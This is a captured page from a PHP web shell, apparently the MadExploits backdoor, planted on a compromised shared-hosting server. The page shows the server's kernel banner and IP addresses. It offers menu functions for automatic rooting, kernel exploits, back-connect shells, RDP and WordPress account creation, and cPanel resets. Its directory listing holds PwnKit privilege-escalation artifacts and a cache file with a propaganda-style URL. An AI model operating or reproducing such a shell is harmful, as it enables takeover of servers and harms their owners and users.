Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.139.105.18
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
lscache /
9 /
c /
2 /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-sr-x
GCONV_PATH=.
[ DIR ]
drwxr-sr-x
.mad-root
0
B
-rw-r--r--
9c20492d243162b2
16.86
KB
-rw-rw----
9c2109e6d50834b7
66.1
KB
-rw-rw----
9c266e8ceb1abead
523
B
-rw-rw----
9c279cf38887c514
583
B
-rw-rw----
9c29dee197f6fc1a
135.57
KB
-rw-rw----
9c2a3c19d0f6af32
504
B
-rw-rw----
9c2ae8f158e92ae7
1.01
KB
-rw-rw----
9c2b55ec0d091b29
522
B
-rw-rw----
9c2b74288a91290f
587
B
-rw-rw----
9c2d39a3e0ab399e
24.56
KB
-rw-rw----
9c2d6a4fc3876f0b
952
B
-rw-rw----
9c2f3a335298b56c
27.21
KB
-rw-rw----
9c2f62fcefd006c1
16.57
KB
-rw-rw----
9c2fc27cbb0669e8
569
B
-rw-rw----
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 9c2d6a4fc3876f0b
LSCHv�mc��mc � O � a /leaked-documents-expose-ukrainian-attempts-to-destabilize-russia-and-draw-nato-into-a-full-scale-war-with-moscow/%5C%22https:%5C/%5C/cdni.russiatoday.com%5C/files%5C/2022.09%5C/original%5C/63245ee42030273901099fa0.jpg%5C%22a16_HTTP.404,a16_HTTP.301,a16_404,a16_URL.4e2d968e5ad10efc2f302309cfbc1eeb,a16_x-powered-by: PHP/8.1.12 pragma: no-cache expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 x-redirect-by: WordPress location: https://anonymouswire.com/leaked-documents-expose-ukrainian-attempts-to-destabilize-russia-and-draw-nato-into-a-full-scale-war-with-moscow/%5C%22https:%5C/%5C/cdni.russiatoday.com%5C/files%5C/2022.09%5C/original%5C/63245ee42030273901099fa0.jpg%5C x-litespeed-cache-control: public,max-age=3600 x-litespeed-tag: a16_HTTP.404,a16_HTTP.301,a16_404,a16_URL.4e2d968e5ad10efc2f302309cfbc1eeb,a16_
Close